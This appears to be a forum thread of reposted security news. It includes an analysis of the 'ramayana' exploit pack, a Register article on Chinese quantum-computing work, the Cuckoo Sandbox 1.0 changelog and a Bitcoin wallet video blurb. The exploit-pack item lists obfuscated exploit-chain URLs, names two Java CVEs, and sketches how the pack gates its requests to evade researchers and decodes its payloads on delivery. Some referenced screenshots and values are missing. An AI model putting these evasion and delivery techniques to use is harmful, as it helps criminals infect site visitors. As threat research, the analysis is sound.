The "DotkaChef" exploit pack was discovered several months ago. Its real name is ramayana. Recently, the cybercriminals behind ramayana targeted numerous forums running vulnerable versions of IP.Board (read more here). After successfully exploiting the website, a folder is created with the self-contained exploit pack copied to it.

The PHP script verifies that the incoming URL contains the correct parameters and values, otherwise you won't get infected. This prevents researchers from trying to analyze the pack.
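This kind of parameter gating can be sketched in a few lines of Python. The "f" and "k" parameter names mirror the example URLs in the post; the validation rule itself is invented for the demo, since the real pack's PHP logic was not published:

```python
from urllib.parse import urlparse, parse_qs

# Toy model of request gating on an exploit-pack node: serve the
# exploit only when the query string carries the expected key,
# otherwise give researchers and scanners nothing to look at.
def should_serve(url):
    qs = parse_qs(urlparse(url).query)
    key = qs.get("k", [""])[0]
    # illustrative check: key must be a 16-digit number
    return key.isdigit() and len(key) == 16

print(should_serve("http://website/panel/js/fe0e2feefe/?f=a&k=3900550685053931"))  # → True
print(should_serve("http://website/panel/js/fe0e2feefe/"))                          # → False
```

Requests that fail the check simply get no exploit, which is what makes after-the-fact analysis of these packs so awkward.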
Here's an example exploit chain related to ramayana:

website/panel/js/fe0e2feefe/?=MDct5ibpFWbf12c8lzM1ATN4YDM1UDMwkzM89SZmVWZmJTZwUmZvMnavwWZuFGcvUGdpNnYld3LvoDc0RHa8NnZ
website/panel/js/fe0e2feefe/?f=a&k=3900550685053931
website/panel/js/fe0e2feefe/?f=s&k=3900550685053919
website/panel/js/fe0e2feefe/?f=sm_main.mp3&k=3900550685053942

Here's the part of the script that sends the exploit over. There are two Java exploits used: atom.jar (CVE-2013-2423) and byte.jar (CVE-2013-1493). The Java applets and their related payloads are the four other files you see in the folder screenshot above. Those files are base64-encoded and are decoded upon delivery.

A stats file is also created which contains the key parameter from the URL and a status code. The PHP script defines the values of the status code:

The backend system that controls the exploit pack nodes runs Python. It does a health check, builds the exploit pack files, pushes out updates, and other things. And of course there is a dashboard with a statistics panel which is fed by a stat-harvesting script. This appears to be an important measure of an exploit pack's success and therefore part of most control panels.

Summary

"RedKit" and ramayana may represent a new class of exploit packs and an evolutionary improvement over their peers. Their exploitation methods remain the same, but the delivery system uniquely leverages compromised websites to host disposable components of their exploit pack in order to maximize resiliency, protect their backend systems and, ultimately, ensure the longevity of their criminal operations. Time will tell if Exploit Delivery Networks become the new norm, but it's something to keep a close eye on nonetheless.

Sursa: Exploit Delivery Networks | Kahu Security
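The decode-on-delivery step described in the post can be sketched in a few lines (the payload bytes here are placeholders; the real pack does this in PHP on the compromised host):

```python
import base64

# Exploit-pack components (applets, payload EXEs) sit on the
# compromised host base64-encoded and are decoded only when served,
# so the raw binaries are never stored in recognizable form.
def store(component: bytes) -> bytes:
    return base64.b64encode(component)

def serve(stored: bytes) -> bytes:
    return base64.b64decode(stored)

payload = b"MZ\x90\x00"           # placeholder PE header bytes
on_disk = store(payload)          # what sits in the pack's folder
assert on_disk != payload         # not the raw binary
assert serve(on_disk) == payload  # what the exploit chain delivers
```

The encoding is trivially reversible; its purpose is evasion of casual inspection, not cryptographic protection.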
-
China ALSO building encryption-cracking quantum computer
You didn't think we'd let the West have all the fun, did you?
By Phil Muncaster, 10th January 2014

It's not just the NSA that's said to be working on a quantum computer: China is also pulling out all the stops to beat its arch-rival with a crypto-cracking machine of its own. The National Natural Science Foundation of China funded 90 quantum-based projects in 2013, with the order from Beijing to get the job done irrespective of the cost, according to the South China Morning Post.

"The value of the quantum computer to the military and government is so great, its cost has never been considered," Zhejiang University professor Wang Haohua told the paper. "Many Chinese scientists abroad, such as myself, have been attracted by the rapid technological development in China and are returning home. We hope to help China catch up with the West. It is not impossible that we may even win the race in the future."

As part of the huge effort by academics and military boffins, China has apparently built a three-storey Steady High Magnetic Field Experimental Facility on Hefei Science Island, Anhui province. Once operational, the facility could generate a magnetic field in excess of 45 Tesla, creating a more stable environment for quantum research by increasing the distance between qubits, according to the report.

"Under super-strong magnetic fields, the distance between qubits can be increased, making our jobs easier," project leader Chen Hongwei told the paper. "If qubits can be tamed this way, the first quantum computer may be born inside a magnet."

The latest batch of Edward Snowden docs revealed last week that the NSA has budgeted $79.7m for the development of a quantum computer capable of cracking most kinds of encryption systems. However, its "Owning the Net" initiative apparently faces competition from rival projects in the EU and Switzerland, as well as China.
Even with the brightest minds on the planet and the unlimited resources of China working on the problem, it could still be decades before a working quantum computer is built, according to some experts. ®

Sursa: China ALSO building encryption-cracking quantum computer • The Register
-
Cuckoo Sandbox 1.0

It took a while. After almost four years of development, ups and downs, more people joining the project and more people using it, we finally reached version 1.0. We've been procrastinating a lot while trying to get this release done, mainly out of concern for having a mature enough software worthy of the release code, but it's finally completed and ready for download!

There are a number of improvements, bugfixes and new features available in this release. Most importantly, Cuckoo is now provided with a full-fledged Django and MongoDB-powered web interface. Similarly to Malwr, you can use it to submit files and URLs, browse through the analyses as well as search across the full dataset. Other noteworthy additions are support for VMware ESXi, new modules, more analysis packages and an overall improvement in stability and reliability of the software.

Changelog

Following is the CHANGELOG for this version:

- Introduced Auxiliary modules
- Added option to set sniffing interface for each virtual machine
- Added option to set snapshot for each virtual machine
- Added pagination to API
- Added option to REST API to return compressed archives of files ("all" and "dropped")
- Added option to set Result Server IP and port for each virtual machine
- Added processing module for Volatility to analyze memory dumps, disabled by default
- Added new "reported" status for analysis tasks
- Added automated rescheduling of locked tasks at startup
- Added tags to machines
- Added reduced behavioral events
- Added new Django/Mongo-powered web interface
- Added Windows analyzer auxiliary module to disguise the analysis environment
- Added VBS, CPL and RTF analysis package
- Added generic analysis package to execute samples via cmd.exe
- Added MAEC 4.0.1 reporting module
- Added filter for private networks in Network Analysis processing module
- Added max_analysis_count to cuckoo.conf to automatically shutdown Cuckoo
- Added check for available disk space
- Added support for BSON logging format
- Added option to specify a custom DLL to the analyzer and the analysis packages
- Added ICMP protocol dissection
- Added ESX Virtual Machine Manager
- Slightly improved CuckooMon's stealthiness and stability
- Refactored processing to improve performances
- Refactored signature engine, introducing event-based signatures to improve performances
- Refactored generation of process tree
- Transitioned network sniffer to auxiliary module
- Renamed MachineManagers to Machinery modules
- Renamed Metadata to MMDef reporting module
- Fixed virtual machine clock, now updated to current time or specified by user via --clock option
- Fixed bug in Human auxiliary module, now moving cursor to absolute positions
- Fixed issue in Human auxiliary module, using SetCursorPos instead of mouse_event
- Fixed issues with resolving relative filenames in CuckooMon
- Removed support for GrayLog2
- Removed pickle reporting module
- Removed MAEC 1.1 reporting module

Known Issues

At the moment we are only aware of one existing issue when analyzing .NET applications. In most cases you'll have inconsistent results and possibly crashes or sudden termination of the analyzed binary. We are currently investigating the issue and we'll hopefully have a fix in the near future.

Conclusions

This release represents an important landmark for the maturity of the project. We've made it this far thanks to the support of the community and the outstanding work of our developers and our contributors, committed to providing a valuable open source software to the public and dedicating every bit of time to it.

Enjoy.

published on 2014-01-09 17:30:00 by nex

Sursa: Automated Malware Analysis - Cuckoo Sandbox
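The REST API mentioned in the changelog can be driven from a short script. A hedged sketch: /tasks/create/file is the documented file-submission endpoint of Cuckoo's API server, while the host, port and sample name are placeholder assumptions; the request is only built here, not sent:

```python
import urllib.request

# Build (but do not send) a multipart/form-data request for Cuckoo's
# REST API file-submission endpoint. Host/port are assumptions; adjust
# to wherever your Cuckoo API server is listening.
def build_submit_request(host, port, filename, data):
    boundary = "----cuckoo-demo-boundary"
    body = (
        ("--%s\r\n" % boundary)
        + ('Content-Disposition: form-data; name="file"; filename="%s"\r\n' % filename)
        + "Content-Type: application/octet-stream\r\n\r\n"
    ).encode() + data + ("\r\n--%s--\r\n" % boundary).encode()
    return urllib.request.Request(
        "http://%s:%d/tasks/create/file" % (host, port),
        data=body,
        headers={"Content-Type": "multipart/form-data; boundary=%s" % boundary},
    )

req = build_submit_request("localhost", 8090, "sample.exe", b"MZ...")
print(req.full_url)  # → http://localhost:8090/tasks/create/file
```

Sending the request with urllib.request.urlopen(req) would return the new task's ID, which you can then poll for the "reported" status introduced in this release.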
-
[h=1]VIDEO: Understanding Bitcoin and Securing your Digital Wallet[/h]

Digital currencies such as Bitcoin grew in popularity in 2013 and are set to be one of this year's big talking points. One essential ingredient of a digital currency is somewhere to store your money: a digital wallet. Just like a real wallet, it's wise to take steps to secure your digital counterpart to keep your money safe.

In this video, AVG's Michael McKinnon gives a short guide to securing your digital wallet and keeping your digital currency safe.

[h=3]Watch the guide[/h]

Sursa: VIDEO: How to secure your digital wallet